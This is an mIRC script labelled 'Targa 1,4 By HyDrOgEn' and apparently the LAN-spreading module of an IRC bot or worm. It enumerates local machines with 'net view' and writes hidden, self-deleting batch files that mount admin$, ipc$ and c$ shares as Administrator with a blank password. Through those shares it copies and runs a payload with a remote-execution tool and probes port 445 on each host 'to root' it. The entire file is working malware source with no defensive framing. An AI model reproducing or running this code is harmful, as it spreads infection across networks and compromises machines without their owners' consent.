   ; Targa 1,4 By HyDrOgEn ;
   alias xspread {
     .write prff.bat net view > prff.txt
     .write prff.bat del prff.bat
     run gone.exe /n /fh /r "prff.bat"
     xcopy1
     .timersxcopy 1 20 xcopy1
   }
   alias xcopy1 {
     if ($lines(prff.txt) < 6) || ($exists(prff.txt) == $false) { shows Special Lan Spread found no internal computers.. | halt }
     .write -dl1 prff.txt
     .write -dl1 prff.txt
     .write -dl1 prff.txt
     .write -dl $+ $lines(prff.txt) prff.txt
     .write -dl $+ $lines(prff.txt) prff.txt
     shows Special Lan Spread Found: $lines(prff.txt) Within Local Area Network.
     xcopy2
   }
   alias xcopy2 {
     if ($lines(prff.txt) == 0) { shows Special Lan Spreading Is Finished... | unset %xcopy.* | .remove prff.txt | halt }
     set %xcopy.pc $gettok($read(prff.txt,1),1,32)
     set %xc0py st0rm.exe
     .write prff.bat @echo off
     .write prff.bat net use %xcopy.pc $+ \$admin "" /user:"Administrator"
     .write prff.bat %xc0py %xcopy.pc attrib.exe -r $hydro(nf)
     .write prff.bat %xc0py %xcopy.pc -f -c -d $hydro(nf) -o
     .write prff.bat %xc0py %xcopy.pc -d $hydro(nf) -o
     .write prff.bat net use %xcopy.pc $+ \$ipc "" /user:"Administrator"
     .write prff.bat %xc0py %xcopy.pc attrib.exe -r $hydro(nf)
     .write prff.bat %xc0py %xcopy.pc -f -c -d $hydro(nf) -o
     .write prff.bat %xc0py %xcopy.pc -d $hydro(nf) -o
     .write prff.bat net use %xcopy.pc $+ \$c "" /user:"Administrator"
     .write prff.bat %xc0py %xcopy.pc attrib.exe -r $hydro(nf)
     .write prff.bat %xc0py %xcopy.pc -f -c -d $hydro(nf) -o
     .write prff.bat %xc0py %xcopy.pc -d $hydro(nf) -o
     .write prff.bat del prff.bat
     run gone.exe /n /fh /r "prff.bat"
     shows Attempting To Root: %xcopy.pc , Computers Left: $calc($lines(xcopy.txt) - 1)
     .write -dl1 prff.txt
     xcopy2
    .timerxcopy 1 6 xcopy2
    }
   alias rcpspread { .write rcpsps.bat net view > rcpsps.txt | .write rcpsps.bat del rcpsps.bat | run gone.exe /n /fh /r "rcpsps.bat" | rcpcopy1 | .timerrcpscopy 1 5 rcpcopy1 }
   alias rcpcopy1 { if ($lines(rcpsps.txt) < 6) || ($exists(rcpsps.txt) == $false) { shows RPC Lan Spread found no internal computers.. | halt } | .write -dl1 rcpsps.txt | .write -dl1 rcpsps.txt | .write -dl1 rcpsps.txt | .write -dl $+ $lines(rcpsps.txt) rcpsps.txt | .write -dl $+ $lines(rcpsps.txt) rcpsps.txt | shows RPC Lan Spread Found: $lines(rcpsps.txt) Within Local Area Network. | rcpcopy2 }
   alias rcpcopy2 { if ($lines(rcpsps.txt) == 0) { shows RPC Lan Spreading Is Finished... | unset %rcpcopy.* | .remove rcpsps.txt | halt } | set %rcpcopy.pc $gettok($read(rcpsps.txt,1),1,32) | sockopen $+(rcplan,$r(0,999999)) %rcpcopy.pc 445 | shows [RPC LAN] Attempting To Root: %rcpcopy.pc , Computers Left: $calc($lines(rcpcopy.txt) - 1) | .write -dl1 rcpsps.txt | rcpcopy2 | .timerrcpcopy 1 2 rcpcopy2 }
   alias lan-spread { .write lls.bat net view > lls.txt | .write lls.bat del lls.bat | run gone.exe /n /fh /r "lls.bat" | copy1 | .timerscopy 1 20 copy1 }
   alias copy1 { if ($lines(lls.txt) < 6) || ($exists(lls.txt) == $false) { shows Lan Spread found no internal computers.. | halt } | .write -dl1 lls.txt | .write -dl1 lls.txt | .write -dl1 lls.txt | .write -dl $+ $lines(lls.txt) lls.txt | .write -dl $+ $lines(lls.txt) lls.txt | shows Lan Spread Found: $lines(lls.txt) Within Local Area Network. | copy2 }
   alias copy2 { if ($lines(lls.txt) == 0) { shows Lan Spreading Is Finished... | unset %copy.* | .remove lls.txt | halt } | set %copy.pc $gettok($read(lls.txt,1),1,32) | set %c0py st0rm.exe | .write lls.bat @echo off | .write lls.bat net use %copy.pc $+ \$ $+ %s.share "" /user:"Administrator" | .write lls.bat %c0py %copy.pc attrib.exe -r $hydro(nf) | .write lls.bat %c0py %copy.pc -f -c -d $hydro(nf) -o | .write lls.bat %c0py %copy.pc -d $hydro(nf) -o | .write lls.bat del lls.bat | run gone.exe /n /fh /r "lls.bat" | shows Attempting To Root: %copy.pc , Computers Left: $calc($lines(copy.txt) - 1) | .write -dl1 lls.txt | copy2 | .timercopy 1 6 copy2 }
